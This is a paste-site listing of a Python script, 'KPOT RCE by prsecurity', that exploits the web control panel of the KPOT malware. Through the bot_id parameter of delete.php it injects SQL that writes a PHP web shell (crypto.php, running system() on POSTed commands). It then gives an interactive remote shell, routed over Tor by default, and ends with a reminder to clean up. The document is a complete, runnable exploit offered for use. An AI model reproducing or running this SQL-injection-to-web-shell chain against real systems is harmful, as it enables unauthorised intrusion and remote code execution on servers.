· 7 years ago · Nov 26, 2018, 02:38 AM
1import requests
2import argparse
3import base64
4
5# KPOT Control Panel RCE
6# requires pysocket for tor and requests for requests :-p
7
8def get_args():
9 parser = argparse.ArgumentParser(
10 prog="kpot_sploit.py",
11 formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
12 epilog= '''
13 This script will exploit the RCE/SQL vulnerability in KPOT Dashboard.
14 ''')
15 parser.add_argument("target", help="URL of WebPanel (ex: http://target.com/panel/)")
16 # parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
17 parser.add_argument("-p", "--proxy", default="socks5://localhost:9150", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
18 args = parser.parse_args()
19 return args
20
21def pwn_target(target, proxy):
22 requests.packages.urllib3.disable_warnings()
23 proxies = {'http': proxy, 'https': proxy}
24 print('[*] Probing...')
25 get_params = {
26 'bot_id':"666'; ATTACH DATABASE 'crypto.php' AS dba; CREATE TABLE IF NOT EXISTS dba.mytable(text TEXT NOT NULL); INSERT INTO dba.mytable VALUES('<?php echo system($_POST[\"cmd\"]); ?>'); --",
27 'file':'123'
28 }
29 try:
30 r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
31 print("[*] Your IP: {}".format(r.text))
32 headers = {
33 "User-agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0"
34 }
35 r = requests.get(target + '/delete.php', params=get_params, headers=headers, verify=False, proxies=proxies, allow_redirects=False)
36 print('[+] If it worked, you will get a funky shell...')
37 while(1):
38 try:
39 cmd = input("$ ")
40 r = requests.post(target + '/crypto.php', data={'cmd':cmd}, headers=headers, verify=False, proxies=proxies, allow_redirects=False)
41 print(r.text[300:])
42 except KeyboardInterrupt:
43 print("[+] Bye! Don't forget to clean up.")
44 exit(0)
45 except:
46 print("[-] ERROR: Something went wrong.")
47 print(r.text)
48 raise
49
50def main():
51 print ()
52 print ('KPOT RCE by prsecurity.')
53 args = get_args()
54 pwn_target(args.target.strip(), args.proxy.strip())
55
56
57if __name__ == '__main__':
58 main()